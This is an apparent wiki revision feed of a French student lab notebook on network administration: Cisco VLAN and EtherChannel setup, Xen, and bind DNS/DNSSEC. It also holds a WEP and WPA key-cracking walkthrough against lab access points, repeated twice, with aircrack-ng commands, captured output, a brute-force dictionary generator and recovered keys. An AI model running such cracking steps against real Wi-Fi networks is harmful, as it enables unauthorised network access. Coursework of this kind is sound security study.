 44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            &lt;br /&gt;
                                                                                                                                      &lt;br /&gt;
 04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   &lt;br /&gt;
 (not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   &lt;br /&gt;
 (not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   &lt;br /&gt;
 44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2&lt;br /&gt;
&lt;br /&gt;
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :&lt;br /&gt;
 airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 &lt;br /&gt;
&lt;br /&gt;
Une fois le fichier de capture créé, nous avons exécuter la commande &lt;br /&gt;
&lt;br /&gt;
 aircrack cracotte06-01.cap&lt;br /&gt;
&lt;br /&gt;
afin débuter le crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant en quelques minutes :&lt;br /&gt;
&lt;br /&gt;
                 [00:01:53] Tested 279622 keys (got 31535 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) &lt;br /&gt;
    1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) &lt;br /&gt;
    2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) &lt;br /&gt;
    3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) &lt;br /&gt;
    4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) &lt;br /&gt;
    5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) &lt;br /&gt;
    6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) &lt;br /&gt;
    7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) &lt;br /&gt;
    8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) &lt;br /&gt;
    9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) &lt;br /&gt;
   10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) &lt;br /&gt;
   11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) &lt;br /&gt;
   12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
La clé a été trouver et sa valeur est &amp;quot;EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44&amp;quot;&lt;br /&gt;
&lt;br /&gt;
===Craquage de clé WPA===&lt;br /&gt;
&lt;br /&gt;
Le craquage d'une clé WPA est beaucoup plus long que celui d'une clé WEP car le crack doit effectuer un test sur tout les nombres à 8 chiffres jusqu'à arriver au mot de passe de la borne Wifi. C'est un crack en force brute.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc tout d'abord génerer un fichier texte contenant tout les nombres à 8 chiffres (de 00000000 à 99999999) grâce au petit programme c suivant :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define MAX_NUM 99999999&lt;br /&gt;
&lt;br /&gt;
 int main(){&lt;br /&gt;
 long chiffre = 0;&lt;br /&gt;
 FILE* fp = NULL;&lt;br /&gt;
 fp = fopen(&amp;quot;dictionnaire.txt&amp;quot;,&amp;quot;a+&amp;quot;);&lt;br /&gt;
 	if (fp != NULL){&lt;br /&gt;
 		for (chiffre=0;chiffre&amp;lt; MAX_NUM + 1;chiffre++)&lt;br /&gt;
 		{&lt;br /&gt;
 		fprintf(fp,&amp;quot;%08li\n&amp;quot;,chiffre);&lt;br /&gt;
 		}&lt;br /&gt;
 	fclose(fp);&lt;br /&gt;
 	}&lt;br /&gt;
 return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Une fois le dictionnaire généré, on effectue la même commande qu'avec le crackage WEP mais pour les clés WPA : &lt;br /&gt;
&lt;br /&gt;
1. On bascule l'interface wifi en mode monitor :&lt;br /&gt;
 airmon-ng start wlan2&lt;br /&gt;
&lt;br /&gt;
2. On fait un airodump-ng de tout les réseaux possédant un chiffrage WPA :&lt;br /&gt;
 airodump-ng --encrypt WPA wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 00:19:07:C5:0F:A4  -44        7        8    2   1  54e. WPA2 CCMP   MGT  PolytechLille                                              &lt;br /&gt;
 00:19:07:C5:0F:A2  -48        5        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A5  -48        6        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A3  -50        7        0    0   1  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 00:19:07:C5:0F:A1  -50        7        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A7  -52        6        0    0   1  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 00:19:07:C5:0F:A6  -52        5        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A0  -54        6        2    0   1  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 00:19:07:C5:0F:A8  -55        5        5    0   1  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:9C:50:53  -62        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte04                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte03                                                 &lt;br /&gt;
 04:DA:D2:9C:50:58  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte09                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -66        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte01                                                 &lt;br /&gt;
 04:DA:D2:9C:50:55  -65        6        0    0  13  54e. WPA2 CCMP   PSK  cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -65        3        0    0  13  54e. WPA2 CCMP   PSK  cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:59  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte10                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:57  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:51  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte02                                                 &lt;br /&gt;
 04:DA:D2:CF:01:91  -69        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 C8:00:84:84:00:53  -70        3        0    0   9  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 C8:00:84:84:00:52  -71        4        0    0   9  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:98  -70        2        0    0   5  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:CF:01:90  -71        3        0    0   5  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 04:DA:D2:CF:01:95  -72        2        0    0   5  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:97  -72        2        0    0   5  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 04:DA:D2:CF:01:96  -72        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. Nous décidons de cracker cracotte09, on lance un airodump sur son essid et on effectue une capture &lt;br /&gt;
 &lt;br /&gt;
 airodump-ng -w cracotte09 --encrypt wpa -c 13 -essid cracotte09 wlan05&lt;br /&gt;
&lt;br /&gt;
4. On lance le aircrack avec le fichier de capture et notre dictionnaire généré précédemment :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w dictionnaire.txt cracotte09-01.cap&lt;br /&gt;
&lt;br /&gt;
5. Au bout de 57:55 minutes, nous avons obtenu la clé suivante :&lt;br /&gt;
&lt;br /&gt;
passphrase : 12399909&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35465</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35465"/>
				<updated>2016-11-28T13:09:01Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#vlan database&lt;br /&gt;
 3 Switch-E304(vlan)#vlan x name nameX&lt;br /&gt;
 4 Switch-E304(vlan)#exit&lt;br /&gt;
&lt;br /&gt;
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface GigabitEthernet 4/x&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport access vlan x&lt;br /&gt;
 6 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 7 Switch-E304(config-if)#end&lt;br /&gt;
 8 Switch-E304#write memory (enregistrer la configuration)&lt;br /&gt;
&lt;br /&gt;
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :&lt;br /&gt;
&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;br /&gt;
&lt;br /&gt;
===Configuration d'une EtherChannel===&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.&lt;br /&gt;
&lt;br /&gt;
Voici la commande à rentrer dans l'interface de configuration du commutateur :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
 6 Switch-E304(config-if)#channel-protocol lacp&lt;br /&gt;
 7 Switch-E304(config-if)#channel-group 1 mode passive&lt;br /&gt;
 8 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 9 Switch-E304(config-if)#end&lt;br /&gt;
 10 Switch-E304#write memory (enregistrer la configuration)  &lt;br /&gt;
&lt;br /&gt;
Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS et DNSSEC avec bind===&lt;br /&gt;
&lt;br /&gt;
La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi.&lt;br /&gt;
Il faut alors se diriger sur la rubrique :''Gérer les Glue records''.&lt;br /&gt;
A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine :&lt;br /&gt;
&lt;br /&gt;
'''nom du serveur''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''IP''' : 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique ''modifier les serveurs DNS'' :&lt;br /&gt;
&lt;br /&gt;
'''DNS1''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''DNS2''' : ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier ''/etc/bind'' de notre machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
Nous modifions dans un premier temps le fichier ''named.conf.local'' afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;bielloumutherfucker.space&amp;quot; {&lt;br /&gt;
 type master;&lt;br /&gt;
 FIle &amp;quot;/etc/bind/zones/db.bielloumutherfucker.space&amp;quot;;&lt;br /&gt;
 allow-transfer {217.70.177.40; };&lt;br /&gt;
 notify yes;	&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
nous créons ensuite un dossier ''zones'' à l'intérieur duquel nous créons notre fichier de zone ''db.bielloumutherfucker.space'' :&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.bielloumutherfucker.space. root.bielloumutherfucker.space. (&lt;br /&gt;
                    2015102001         ; Serial&lt;br /&gt;
                         86400         ; Refresh&lt;br /&gt;
                          3600         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                         86400 )       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
 @       IN      NS      ns.bielloumutherfucker.space.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.167&lt;br /&gt;
 www     IN      A       193.48.57.167&lt;br /&gt;
 @	IN	A	193.48.57.167&lt;br /&gt;
&lt;br /&gt;
Il nous faut ensuite modifier notre fichier ''/etc/resolv.conf'' afin de passer par notre serveur :&lt;br /&gt;
&lt;br /&gt;
 search bielloumutherfucker.space&lt;br /&gt;
 nameserver 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, notre serveur DNS est opérationnel. Il nous faut maintenant le sécuriser grâce à DNSSEC.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il nous faut générer les clefs asymétriques KSK et ZSK. Nous entrons alors les commandes suivantes dans le terminal :&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -f KSK -b 2048 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef KSK&lt;br /&gt;
 dnssec-keygen -a RSASHA1 --b 1024 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef ZSK&lt;br /&gt;
&lt;br /&gt;
Nous avons maintenant 4 clefs : deux pour chaque type de clef (KSK ou ZSK) avec deux extention différentes (.key pour la clef publique, .private pour la privée).&lt;br /&gt;
&lt;br /&gt;
Après les avoir placé dans le répertoire ''bielloumutherfucker.space.dnssec'' que nous avons crée, on les renomme selon le schéma suivant :&lt;br /&gt;
&lt;br /&gt;
 bielloumutherfucker.space-ksk.key et bielloumutherfucker.space-ksk.private&lt;br /&gt;
 bielloumutherfucker.space-zsk.key et bielloumutherfucker.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant signer la zone à l'aide de la commande suivante (depuis le dossier /etc/bind) :&lt;br /&gt;
&lt;br /&gt;
 dnssec-signzone -o bielloumutherfucker.space -k bielloumutherfucker.space-ksk &lt;br /&gt;
 zones/db.bielloumutherfucker.space bielloumutherfucker.space-zsk&lt;br /&gt;
&lt;br /&gt;
Une nouvelle zone, signée, a donc été créée dans notre dossier ''zones''. Il ne nous reste plus qu'à modifier le fichier ''named.conf.local'' en rajoutant un ''.signed'' à la fin du champ File pour notre zone. Nous redémarrons ensuite le serveur bind.&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Nous retournons sur le site de gandi et dans la rubrique ''gérer DNSSEC'' nous ajoutons notre clef publique avec l'algorithme ''RSASHA1''. Une fois la clef ajoutée sur gandi, on peut voir que tous s'est bien passé en faisant un tour sur le site ''Zone Master'', l'attribut DNSSEC est en effet coché et vert.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec.png]]&lt;br /&gt;
&lt;br /&gt;
===Crackage de clé WEP===&lt;br /&gt;
&lt;br /&gt;
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP.&lt;br /&gt;
Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                                &lt;br /&gt;
 04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            &lt;br /&gt;
                                                                                                                                      &lt;br /&gt;
 04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   &lt;br /&gt;
 (not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   &lt;br /&gt;
 (not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   &lt;br /&gt;
 44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2&lt;br /&gt;
&lt;br /&gt;
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :&lt;br /&gt;
 airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 &lt;br /&gt;
&lt;br /&gt;
Une fois le fichier de capture créé, nous avons exécuter la commande &lt;br /&gt;
&lt;br /&gt;
 aircrack cracotte06-01.cap&lt;br /&gt;
&lt;br /&gt;
afin débuter le crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant en quelques minutes :&lt;br /&gt;
&lt;br /&gt;
                 [00:01:53] Tested 279622 keys (got 31535 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) &lt;br /&gt;
    1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) &lt;br /&gt;
    2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) &lt;br /&gt;
    3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) &lt;br /&gt;
    4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) &lt;br /&gt;
    5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) &lt;br /&gt;
    6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) &lt;br /&gt;
    7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) &lt;br /&gt;
    8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) &lt;br /&gt;
    9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) &lt;br /&gt;
   10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) &lt;br /&gt;
   11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) &lt;br /&gt;
   12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
La clé a été trouver et sa valeur est &amp;quot;EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44&amp;quot;&lt;br /&gt;
&lt;br /&gt;
===Craquage de clé WPA===&lt;br /&gt;
&lt;br /&gt;
Le craquage d'une clé WPA est beaucoup plus long que celui d'une clé WEP car le crack doit effectuer un test sur tout les nombres à 8 chiffres jusqu'à arriver au mot de passe de la borne Wifi. C'est un crack en force brute.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc tout d'abord génerer un fichier texte contenant tout les nombres à 8 chiffres (de 00000000 à 99999999) grâce au petit programme c suivant :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define MAX_NUM 99999999&lt;br /&gt;
&lt;br /&gt;
 int main(){&lt;br /&gt;
 long chiffre = 0;&lt;br /&gt;
 FILE* fp = NULL;&lt;br /&gt;
 fp = fopen(&amp;quot;dictionnaire.txt&amp;quot;,&amp;quot;a+&amp;quot;);&lt;br /&gt;
 	if (fp != NULL){&lt;br /&gt;
 		for (chiffre=0;chiffre&amp;lt; MAX_NUM + 1;chiffre++)&lt;br /&gt;
 		{&lt;br /&gt;
 		fprintf(fp,&amp;quot;%08li\n&amp;quot;,chiffre);&lt;br /&gt;
 		}&lt;br /&gt;
 	fclose(fp);&lt;br /&gt;
 	}&lt;br /&gt;
 return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Une fois le dictionnaire généré, on effectue la même commande qu'avec le crackage WEP mais pour les clés WPA : &lt;br /&gt;
&lt;br /&gt;
1. On bascule l'interface wifi en mode monitor :&lt;br /&gt;
 airmon-ng start wlan2&lt;br /&gt;
&lt;br /&gt;
2. On fait un airodump-ng de tout les réseaux possédant un chiffrage WPA :&lt;br /&gt;
 airodump-ng --encrypt WPA wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 00:19:07:C5:0F:A4  -44        7        8    2   1  54e. WPA2 CCMP   MGT  PolytechLille                                              &lt;br /&gt;
 00:19:07:C5:0F:A2  -48        5        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A5  -48        6        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A3  -50        7        0    0   1  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 00:19:07:C5:0F:A1  -50        7        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A7  -52        6        0    0   1  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 00:19:07:C5:0F:A6  -52        5        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A0  -54        6        2    0   1  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 00:19:07:C5:0F:A8  -55        5        5    0   1  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:9C:50:53  -62        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte04                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte03                                                 &lt;br /&gt;
 04:DA:D2:9C:50:58  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte09                                                 &lt;br /&gt;
